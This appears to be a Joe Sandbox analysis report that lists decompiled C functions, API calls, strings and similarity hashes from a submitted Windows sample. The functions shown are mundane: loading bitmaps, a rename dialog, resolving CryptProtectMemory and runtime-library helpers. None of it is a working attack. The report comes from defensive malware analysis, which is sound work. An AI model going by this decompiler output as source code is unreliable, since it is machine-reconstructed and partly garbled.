GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00B6A275,?,?,00000800,?,00B6A23A,?,00B6755C), ref: 00B6BBC5
_wcslen.LIBCMT ref: 00B6BC3B

Strings

\\?\, xrefs: 00B6BB52, 00B6BB99, 00B6BBF7, 00B6BC4E
UNC, xrefs: 00B6BBA7

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: 17458c85600e223d4aa967936d23e78365a978f1392cddfa9a06db5dfacb7358
Instruction ID: 94c0cd0d7095b9733af08c7187f1bb76803c9c6adb529559d6a7ee9df263ceae
Opcode Fuzzy Hash: 17458c85600e223d4aa967936d23e78365a978f1392cddfa9a06db5dfacb7358
Instruction Fuzzy Hash: 14416A31440216B6CF21AF60CC41EAA7BFDEF45790F1484E6F969E3151EB78DAD08A60

Uniqueness

Uniqueness Score: -1.00%

Function 00B7B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7B6DD(void* __ecx, void* __edx, void* __fp0) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				void* _t13;
				void* _t15;
				signed int _t20;
				signed int _t21;
				void* _t23;
				void* _t24;
				void* _t28;
				void* _t35;

				_t35 = __fp0;
				_t23 = __edx;
				_t24 = LoadBitmapW( *0xba1028, 0x65);
				_t21 = _t20 & 0xffffff00 | _t24 == 0x00000000;
				if(_t24 != 0) {
					L2:
					GetObjectW(_t24, 0x18,  &_v28);
					L4:
					if(E00B7A5C6(_t31) != 0) {
						if(_t21 != 0) {
							_t28 = E00B7A6C2(0x66);
							if(_t28 != 0) {
								DeleteObject(_t24);
								_t24 = _t28;
							}
						}
						_t13 = E00B7A605(_v20);
						_t15 = E00B7A80C(_t23, _t35, _t24, E00B7A5E4(_v24), _t13);
						DeleteObject(_t24);
						_t24 = _t15;
					}
					return _t24;
				}
				_t24 = E00B7A6C2(0x65);
				_t31 = _t24;
				if(_t24 == 0) {
					_v24 = 0x5d;
					_v20 = 0x12e;
					goto L4;
				}
				goto L2;
			}

0x00b7b6dd
0x00b7b6dd
0x00b7b6f3
0x00b7b6f7
0x00b7b6fc
0x00b7b70b
0x00b7b712
0x00b7b728
0x00b7b72f
0x00b7b734
0x00b7b73d
0x00b7b741
0x00b7b744
0x00b7b74a
0x00b7b74a
0x00b7b741
0x00b7b74f
0x00b7b75f
0x00b7b767
0x00b7b76d
0x00b7b76f
0x00b7b775
0x00b7b775
0x00b7b705
0x00b7b707
0x00b7b709
0x00b7b71a
0x00b7b721
0x00000000
0x00b7b721
0x00000000

APIs

LoadBitmapW.USER32(00000065), ref: 00B7B6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 00B7B712
DeleteObject.GDI32(00000000), ref: 00B7B744
DeleteObject.GDI32(00000000), ref: 00B7B767

Part of subcall function 00B7A6C2: FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,00B7B73D,00000066), ref: 00B7A6D5
Part of subcall function 00B7A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00B7B73D,00000066), ref: 00B7A6EC
Part of subcall function 00B7A6C2: LoadResource.KERNEL32(00000000,?,?,?,00B7B73D,00000066), ref: 00B7A703
Part of subcall function 00B7A6C2: LockResource.KERNEL32(00000000,?,?,?,00B7B73D,00000066), ref: 00B7A712
Part of subcall function 00B7A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B7B73D,00000066), ref: 00B7A72D
Part of subcall function 00B7A6C2: GlobalLock.KERNEL32 ref: 00B7A73E
Part of subcall function 00B7A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B7A7A7
Part of subcall function 00B7A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00B7A7C6
Part of subcall function 00B7A6C2: GlobalFree.KERNEL32 ref: 00B7A7CD

Strings

], xrefs: 00B7B71A

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
String ID: ]
API String ID: 1428510222-3352871620
Opcode ID: 48e3539bce5195230d96a5e620b8b8838c5f22bb8f8c8f5c89dfa4ee7dca1c03
Instruction ID: c09671062988059db99b56afb7917180035aa2ed58e492fbf161ea9434df0021
Opcode Fuzzy Hash: 48e3539bce5195230d96a5e620b8b8838c5f22bb8f8c8f5c89dfa4ee7dca1c03
Instruction Fuzzy Hash: 5201D23650021567C71277749C09FBF7AFAEFC0B52F088091F928B7291DF21CD054AA2

Uniqueness

Uniqueness Score: -1.00%

Function 00B7D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00B7D600(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				void* _t12;
				WCHAR* _t16;
				void* _t17;
				intOrPtr _t18;
				void* _t19;
				struct HWND__* _t21;
				signed short _t22;

				_t16 = _a16;
				_t22 = _a12;
				_t21 = _a4;
				_t18 = _a8;
				if(E00B61316(_t17, _t21, _t18, _t22, _t16, L"RENAMEDLG", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t19 = _t18 - 0x110;
				if(_t19 == 0) {
					 *0xbbfcb4 = _t16;
					SetDlgItemTextW(_t21, 0x66, _t16);
					SetDlgItemTextW(_t21, 0x68,  *0xbbfcb4);
					goto L10;
				}
				if(_t19 != 1) {
					L5:
					return 0;
				}
				_t12 = (_t22 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t21, 0x68,  *0xbbfcb4, 0x800);
					_push(1);
					L7:
					EndDialog(_t21, ??);
					goto L10;
				}
				if(_t12 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x00b7d601
0x00b7d606
0x00b7d60b
0x00b7d610
0x00b7d628
0x00b7d68a
0x00000000
0x00b7d68c
0x00b7d62a
0x00b7d630
0x00b7d66f
0x00b7d675
0x00b7d684
0x00000000
0x00b7d684
0x00b7d635
0x00b7d644
0x00000000
0x00b7d644
0x00b7d63a
0x00b7d63d
0x00b7d661
0x00b7d667
0x00b7d64a
0x00b7d64b
0x00000000
0x00b7d64b
0x00b7d642
0x00b7d648
0x00000000
0x00b7d648
0x00000000

APIs

Part of subcall function 00B61316: GetDlgItem.USER32(00000000,00003021), ref: 00B6135A
Part of subcall function 00B61316: SetWindowTextW.USER32(00000000,00B935F4), ref: 00B61370

EndDialog.USER32(?,00000001), ref: 00B7D64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00B7D661
SetDlgItemTextW.USER32(?,00000066,?), ref: 00B7D675
SetDlgItemTextW.USER32(?,00000068), ref: 00B7D684

Strings

RENAMEDLG, xrefs: 00B7D618

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 89604b20de2fd88bdfd8b931fb80b41b8391a174513efb43adfbb554531fb971
Instruction ID: 8add197ba250322c82b8f39b7fd5974a51b4ca5dc744097f2f6935fca35f132c
Opcode Fuzzy Hash: 89604b20de2fd88bdfd8b931fb80b41b8391a174513efb43adfbb554531fb971
Instruction Fuzzy Hash: BA01F533284214BBD2115F649E09F6A7BEDEF5AB81F018550F309A3091CAA2DA048769

Uniqueness

Uniqueness Score: -1.00%

Function 00B87E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B87E24,?,?,00B87DC4,?,00B9C300,0000000C,00B87F1B,?,00000002), ref: 00B87E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B87EA6
FreeLibrary.KERNEL32(00000000,?,?,?,00B87E24,?,?,00B87DC4,?,00B9C300,0000000C,00B87F1B,?,00000002,00000000), ref: 00B87EC9

Strings

mscoree.dll, xrefs: 00B87E8C
CorExitProcess, xrefs: 00B87E9E

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 686a39885c6cf77b5f413643bde89f9cf009b2b475ac3cecf8d273652babfe71
Instruction ID: 6b3a93776989d77b3842f2cad0331ed5f68093b3e8fbd5e0da2f824b9320fb5a
Opcode Fuzzy Hash: 686a39885c6cf77b5f413643bde89f9cf009b2b475ac3cecf8d273652babfe71
Instruction Fuzzy Hash: 01F04431944208BBCB119BA0DD09BAEBFF8EF44715F1040EAF805A3260DF359E40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B6F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B6F2C5(struct HINSTANCE__** __ecx) {
				void* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__** _t9;

				_t9 = __ecx;
				if(__ecx[1] == 0) {
					_t6 = E00B7081B(L"Crypt32.dll");
					 *__ecx = _t6;
					if(_t6 != 0) {
						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
						_t9[3] = _t6;
					}
					_t9[1] = 1;
					return _t6;
				}
				return _t5;
			}

0x00b6f2c6
0x00b6f2cc
0x00b6f2d3
0x00b6f2d8
0x00b6f2dc
0x00b6f2f1
0x00b6f2f4
0x00b6f2fa
0x00b6f2fa
0x00b6f2fd
0x00000000
0x00b6f2fd
0x00b6f302

APIs

Part of subcall function 00B7081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B70836
Part of subcall function 00B7081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B6F2D8,Crypt32.dll,00000000,00B6F35C,?,?,00B6F33E,?,?,?), ref: 00B70858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B6F2E4
GetProcAddress.KERNEL32(00BA81C8,CryptUnprotectMemory), ref: 00B6F2F4

Strings

Crypt32.dll, xrefs: 00B6F2CE
CryptUnprotectMemory, xrefs: 00B6F2EA
CryptProtectMemory, xrefs: 00B6F2DE

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 4ccf5d14c8d9cc414d5de08752699c873950e8620650419461807b139fcf56f3
Instruction ID: c6a1e1d2a7623f8deaf2b635c390593565c2e02d73bdf36848894c43c9a93fa8
Opcode Fuzzy Hash: 4ccf5d14c8d9cc414d5de08752699c873950e8620650419461807b139fcf56f3
Instruction Fuzzy Hash: 8CE086709507029ECB209F34A95DB167AD4AF04F14F14C8AEF0DAD3661DAB4D5408B50

Uniqueness

Uniqueness Score: -1.00%

Function 00B7A663 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7A663() {
				struct HDC__* _t1;
				struct HDC__* _t5;

				_t1 = GetDC(0);
				_t5 = _t1;
				if(_t5 != 0) {
					 *0xba8430 = GetDeviceCaps(_t5, 0x58);
					 *0xba8434 = GetDeviceCaps(_t5, 0x5a);
					return ReleaseDC(0, _t5);
				}
				return _t1;
			}

0x00b7a666
0x00b7a66c
0x00b7a670
0x00b7a67e
0x00b7a68c
0x00000000
0x00b7a691
0x00b7a698

APIs

GetDC.USER32(00000000), ref: 00B7A666
GetDeviceCaps.GDI32(00000000,00000058), ref: 00B7A675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B7A683
ReleaseDC.USER32(00000000,00000000), ref: 00B7A691

Strings

v, xrefs: 00B7A691

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: CapsDevice$Release
String ID: v
API String ID: 1035833867-1801730948
Opcode ID: cb319b4dd8f892b04025e2eb9e7877f9387414e40541a0211168240a72e2058c
Instruction ID: d9108ed24ea522d43f783c2324be8bdb3795e81a5943ac168241be95dae28a50
Opcode Fuzzy Hash: cb319b4dd8f892b04025e2eb9e7877f9387414e40541a0211168240a72e2058c
Instruction Fuzzy Hash: CCE0EC33942721A7D2A16B60AC0EF8A3E94EB0EF52F418101FA0597290DF6586008BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B82BDA Relevance: 7.7, APIs: 5, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 63%

			E00B82BDA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed char* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed char _t81;
				signed char _t84;
				signed int _t85;
				signed int _t86;
				signed int _t97;
				signed char _t99;
				signed int* _t100;
				signed char* _t103;
				signed int _t109;
				void* _t113;

				_push(0x10);
				_push(0xb9c248);
				E00B7F5F0(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t113 + 0x10);
				_t81 = _t52[4];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t99 = _t52[8];
					if(_t99 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t109 =  *(_t113 + 0xc);
						if(_t84 >= 0) {
							_t109 = _t109 + 0xc + _t99;
						}
						 *(_t113 - 4) = _t75;
						_t103 =  *(_t113 + 0x14);
						if(_t84 >= 0 || ( *_t103 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t113 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t103 & 0x00000001;
								if(( *_t103 & 0x00000001) == 0) {
									_t85 =  *(_t54 + 0x18);
									__eflags = _t103[0x18] - _t75;
									if(_t103[0x18] != _t75) {
										__eflags = _t85;
										if(_t85 == 0) {
											goto L32;
										} else {
											__eflags = _t109;
											if(_t109 == 0) {
												goto L32;
											} else {
												__eflags =  *_t103 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t103 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t113 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t85;
										if(_t85 == 0) {
											goto L32;
										} else {
											__eflags = _t109;
											if(_t109 == 0) {
												goto L32;
											} else {
												E00B80320(_t109, E00B8027C(_t85,  &(_t103[8])), _t103[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t109;
										if(_t109 == 0) {
											goto L32;
										} else {
											E00B80320(_t109,  *(_t54 + 0x18), _t103[0x14]);
											__eflags = _t103[0x14] - 4;
											if(_t103[0x14] == 4) {
												__eflags =  *_t109;
												if( *_t109 != 0) {
													_push( &(_t103[8]));
													_push( *_t109);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t97 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0xbc205c; // 0x0
							 *((intOrPtr*)(_t113 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0xb93278();
								_t97 =  *((intOrPtr*)(_t113 - 0x1c))();
								L12:
								if(_t97 == 0 || _t109 == 0) {
									L32:
									E00B88D24(_t75, _t99, _t103, _t109);
									asm("int3");
									_push(8);
									_push(0xb9c268);
									E00B7F5F0(_t75, _t103, _t109);
									_t100 =  *(_t113 + 0x10);
									_t86 =  *(_t113 + 0xc);
									__eflags =  *_t100;
									if(__eflags >= 0) {
										_t105 = _t86 + 0xc + _t100[2];
										__eflags = _t86 + 0xc + _t100[2];
									} else {
										_t105 = _t86;
									}
									 *(_t113 - 4) =  *(_t113 - 4) & 0x00000000;
									_t110 =  *(_t113 + 0x14);
									_push( *(_t113 + 0x14));
									_push(_t100);
									_push(_t86);
									_t77 =  *((intOrPtr*)(_t113 + 8));
									_push( *((intOrPtr*)(_t113 + 8)));
									_t58 = E00B82BDA(_t77, _t105, _t110, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E00B838E4(_t105, _t110[0x18], E00B8027C( *((intOrPtr*)(_t77 + 0x18)),  &(_t110[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E00B838F4(_t105, _t110[0x18], E00B8027C( *((intOrPtr*)(_t77 + 0x18)),  &(_t110[8])), 1);
										}
									}
									 *(_t113 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t113 - 0x10));
									return _t61;
								} else {
									 *_t109 = _t97;
									_push( &(_t103[8]));
									_push(_t97);
									L21:
									 *_t109 = E00B8027C();
									L29:
									 *(_t113 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t113 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x00b82bda
0x00b82bdc
0x00b82be1
0x00b82be6
0x00b82be8
0x00b82beb
0x00b82bf0
0x00b82d00
0x00b82d00
0x00b82d00
0x00000000
0x00b82bff
0x00b82bff
0x00b82c04
0x00b82c0e
0x00b82c10
0x00b82c15
0x00b82c1a
0x00b82c1a
0x00b82c1c
0x00b82c1f
0x00b82c24
0x00b82c46
0x00b82c46
0x00b82c49
0x00b82c4c
0x00b82c6a
0x00b82c6d
0x00b82cac
0x00b82caf
0x00b82cb2
0x00b82cd7
0x00b82cd9
0x00000000
0x00b82cdb
0x00b82cdb
0x00b82cdd
0x00000000
0x00b82cdf
0x00b82cdf
0x00b82ce4
0x00b82ce8
0x00b82ce8
0x00b82ce9
0x00000000
0x00b82ce9
0x00b82cdd
0x00b82cb4
0x00b82cb4
0x00b82cb6
0x00000000
0x00b82cb8
0x00b82cb8
0x00b82cba
0x00000000
0x00b82cbc
0x00b82ccd
0x00000000
0x00b82cd2
0x00b82cba
0x00b82cb6
0x00b82c6f
0x00b82c6f
0x00b82c73
0x00000000
0x00b82c79
0x00b82c79
0x00b82c7b
0x00000000
0x00b82c81
0x00b82c88
0x00b82c90
0x00b82c94
0x00b82c96
0x00b82c99
0x00b82c9e
0x00b82c9f
0x00000000
0x00b82c9f
0x00b82c99
0x00000000
0x00b82c94
0x00b82c7b
0x00b82c73
0x00b82c4e
0x00b82c4e
0x00000000
0x00b82c4e
0x00b82c2b
0x00b82c2b
0x00b82c30
0x00b82c35
0x00000000
0x00b82c37
0x00b82c39
0x00b82c42
0x00b82c51
0x00b82c53
0x00b82d12
0x00b82d12
0x00b82d17
0x00b82d18
0x00b82d1a
0x00b82d1f
0x00b82d24
0x00b82d27
0x00b82d2a
0x00b82d2d
0x00b82d36
0x00b82d36
0x00b82d2f
0x00b82d2f
0x00b82d2f
0x00b82d39
0x00b82d3d
0x00b82d40
0x00b82d41
0x00b82d42
0x00b82d43
0x00b82d46
0x00b82d4f
0x00b82d4f
0x00b82d52
0x00b82d88
0x00b82d54
0x00b82d54
0x00b82d54
0x00b82d57
0x00b82d6e
0x00b82d6e
0x00b82d57
0x00b82d8d
0x00b82d97
0x00b82da3
0x00b82c61
0x00b82c61
0x00b82c66
0x00b82c67
0x00b82ca1
0x00b82ca8
0x00b82cec
0x00b82cec
0x00b82cf3
0x00b82d02
0x00b82d05
0x00b82d11
0x00b82d11
0x00b82c53
0x00b82c35
0x00000000
0x00000000
0x00000000
0x00b82c04

APIs

___AdjustPointer.LIBCMT ref: 00B82CA1
___AdjustPointer.LIBCMT ref: 00B82CC4
_abort.LIBCMT ref: 00B82D12
___AdjustPointer.LIBCMT ref: 00B82D60

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: 4fd97e6b6fe5c026ecc08a972c70e58915da3464062197425c7de293fd23b128
Instruction ID: 20b04942bb6474c272639cbf7b8cde6a7afc157652a81ee46fb2542382082fd0
Opcode Fuzzy Hash: 4fd97e6b6fe5c026ecc08a972c70e58915da3464062197425c7de293fd23b128
Instruction Fuzzy Hash: C851CE72600212AFDB28AF14D885BBABBE4FF14710F2445AEEC02476B1E731ED40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B8BF30 Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00B8BF30() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E00B8BEF9(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E00B88E06(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E00B88DCC(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}

0x00b8bf3f
0x00b8bf45
0x00b8bf9d
0x00b8bf9d
0x00b8bf47
0x00b8bf48
0x00b8bf4d
0x00b8bf56
0x00b8bf5c
0x00b8bf62
0x00b8bf67
0x00000000
0x00b8bf69
0x00b8bf6f
0x00b8bf74
0x00b8bf92
0x00b8bf8c
0x00b8bf8c
0x00b8bf8e
0x00b8bf8e
0x00b8bf95
0x00b8bf9a
0x00b8bf67
0x00b8bfa1
0x00b8bfa4
0x00b8bfa4
0x00b8bfb2

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00B8BF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B8BF5C

Part of subcall function 00B88E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B84286,?,0000015D,?,?,?,?,00B85762,000000FF,00000000,?,?), ref: 00B88E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B8BF82
_free.LIBCMT ref: 00B8BF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B8BFA4

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: f8aee7ccfe12c6590ff694be72d9d4d1491a447c9cca0a215504965f6cfdea8c
Instruction ID: 1813919dbe57395f4f2959d188ecd5898f3b26495edc3637d7823ddc3856a419
Opcode Fuzzy Hash: f8aee7ccfe12c6590ff694be72d9d4d1491a447c9cca0a215504965f6cfdea8c
Instruction Fuzzy Hash: 0201B1666012217F23212AB65C98C7BABEDEEC2FA131401A9FA04D3221EF608D01C6B0

Uniqueness

Uniqueness Score: -1.00%

